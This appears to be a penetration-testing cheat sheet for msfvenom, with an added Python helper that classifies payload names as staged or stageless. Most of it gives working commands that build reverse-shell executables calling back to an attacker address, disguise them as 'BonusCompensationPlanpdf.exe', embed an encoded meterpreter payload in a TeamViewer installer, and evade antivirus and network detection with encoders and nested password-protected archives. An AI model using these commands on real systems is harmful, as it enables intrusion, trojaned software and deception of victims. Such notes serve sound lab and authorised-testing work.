# msfvenom

## Listing Payloads

```bash
msfvenom -l payloads
```
## Staged vs Stageless payloads

```
windows/meterpreter/reverse_tcp
```

vs

```
windows/meterpreter_reverse_tcp
```

The former is staged: after the architecture segment, each `/` separates a stage. The latter has no `/` after the `meterpreter` part, so it is stageless.
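The naming rule above, as an added example that is not part of the original cheat sheet: a small parser that splits a payload name into platform, architecture, stage and stager, and reports whether it is staged (the stage is delivered over the connection at run time) or stageless. The set of architecture segments is an assumption, not taken from the page.

```python
# Added example: classify a Metasploit payload name as staged or stageless using
# the rule described above. After the platform and an optional architecture
# segment, a remaining "/" separates the stage from its stager; a single
# segment with "_" (e.g. meterpreter_reverse_tcp) is one stageless payload.
from dataclasses import dataclass
from typing import Optional

# Assumption: architecture segments that may follow the platform in a name.
ARCHES = {"x86", "x64", "aarch64", "armle", "armbe", "mipsle", "mipsbe", "ppc"}


@dataclass
class PayloadName:
    platform: str          # e.g. "windows", "linux", "java"
    arch: Optional[str]    # e.g. "x64", or None when the name has no arch segment
    staged: bool           # True when a stage is fetched separately at run time
    stage: str             # "meterpreter" / "shell", or the full stageless name
    stager: Optional[str]  # e.g. "reverse_tcp" for a staged payload, else None


def parse_payload(name: str) -> PayloadName:
    """Parse names like windows/x64/meterpreter/reverse_https."""
    parts = name.strip().split("/")
    if len(parts) < 2 or not all(parts):
        raise ValueError(f"not a platform/payload name: {name!r}")
    platform, rest = parts[0], parts[1:]

    # Optional architecture segment directly after the platform.
    arch = None
    if rest[0] in ARCHES:
        arch, rest = rest[0], rest[1:]
    if not rest:
        raise ValueError(f"missing payload part in {name!r}")

    if len(rest) == 1:
        # No "/" after the architecture: stage and transport are fused with "_".
        return PayloadName(platform, arch, False, rest[0], None)

    # A "/" after the architecture: first segment is the stage that will be
    # delivered later, the remainder is the stager that fetches it.
    return PayloadName(platform, arch, True, rest[0], "/".join(rest[1:]))


def describe(name: str) -> str:
    """One-line human-readable classification, useful when triaging a sample."""
    p = parse_payload(name)
    kind = "staged" if p.staged else "stageless"
    arch = p.arch or "default arch"
    return f"{name}: {kind} ({p.platform}, {arch}, stage={p.stage}, stager={p.stager})"
```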
## Creating a payload

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf
```

- `-p`: build payload
- `-f`: output format
## List options

```bash
msfvenom -p java/jsp_shell_reverse_tcp --list-options
```
## Basic msfvenom

```bash
msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>
```

One can also use `-a` to specify the architecture, or `--platform` to specify the platform.

### Listing

```bash
msfvenom -l payloads #Payloads
msfvenom -l encoders #Encoders
```
## Common params when creating a shellcode

```bash
-b "\x00\x0a\x0d"
-f c
-e x86/shikata_ga_nai -i 5
EXITFUNC=thread
PrependSetuid=True #Use this to create a shellcode that will execute something with SUID
```
## Encoding

```bash
-b "\x00" -e x86/shikata_ga_nai
```

- `-b`: bad bytes to avoid
- `-e`: encoder to use
## Antivirus evasion

### Hiding payload inside of legitimate executables

```bash
msfvenom -p windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5
```

- `-i`: iterations of encoding
- `-k`: continue with normal execution (keep the template's original behaviour)
- `-x`: input file to embed the payload into
- `-o`: output file
## Archiving

Use multiple zip/rar/compression layers with passwords to evade detection on the network.
## Packing

A list of popular packer software:

Also see PolyPack.